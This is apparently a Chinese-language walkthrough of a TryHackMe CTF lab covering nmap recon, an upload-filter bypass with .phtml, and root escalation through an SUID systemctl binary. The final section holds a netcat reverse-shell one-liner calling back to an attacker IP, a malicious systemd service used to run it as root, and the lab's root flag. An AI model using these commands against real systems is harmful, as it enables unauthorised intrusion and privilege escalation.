Vulnversity ⭐️反弹shell ⭐️systemctl提权
文章目录
task1 Deploy the machine
无需回答
task2 Reconnaissance
1.There are many nmap “cheatsheets” online that you can use too.
无需回答
2.Scan the box, how many ports are open?
6
3.What version of the squid proxy is running on the machine?
3.5.12
4.How many ports will nmap scan if the flag -p-400 was used?
400
5.Using the nmap flag -n what will it not resolve?
DNS
-n 禁用DNS反向解析
6.What is the most likely operating system this machine is running?
Ubuntu
7.What port is the web server running on?
3333
task3 Locating directories using GoBuster
1.What is the directory that has an upload form page?
/internal/
task4 Compromise the webserver
1.Try upload a few file types to the server, what common extension seems to be blocked?
.php
2.Run this attack, what extension is allowed?
.phtml
3.What is the name of the user who manages the webserver?
bill
4.What is the user flag?
task5 Privilege Escalation
1.On the system, search for all SUID files. What file stands out?
/bin/systemctl
find / -user root -perm -4000 -exec ls -ldb {} ; 查找系统所有无法访问的文件
/bin/systemctl 文件具备suid位可以用来提权
2.Its challenge time! We have guided you through this far, are you able to exploit this system further to escalate your privileges and get the final answer?
Become root and get the last flag (/root/root.txt)
a58ff8579f0a9270368d33a9966c7fd5
www-data@vulnuniversity:/tmp$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.23.70 7788 >/tmp/f" > /tmp/shell.sh www-data@vulnuniversity:/tmp$ TF=$(mktemp).service www-data@vulnuniversity:/tmp$ echo '[Service] > Type=oneshot > ExecStart=/bin/sh -c "bash /tmp/shell.sh" > [Install] > WantedBy=multi-user.target' > $TF www-data@vulnuniversity:/tmp$ /bin/systemctl link $TF Created symlink from /etc/systemd/system/tmp.CHTuvfkaoz.service to /tmp/tmp.CHTuvfkaoz.service. www-data@vulnuniversity:/tmp$ /bin/systemctl enable --now $TF Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.CHTuvfkaoz.service to /tmp/tmp.CHTuvfkaoz.service.
提权思路 /bin/systemctl文件拥有sudo权限,新建一个service让systemctl加载服务,即可执行任意脚本
即可执行任意脚本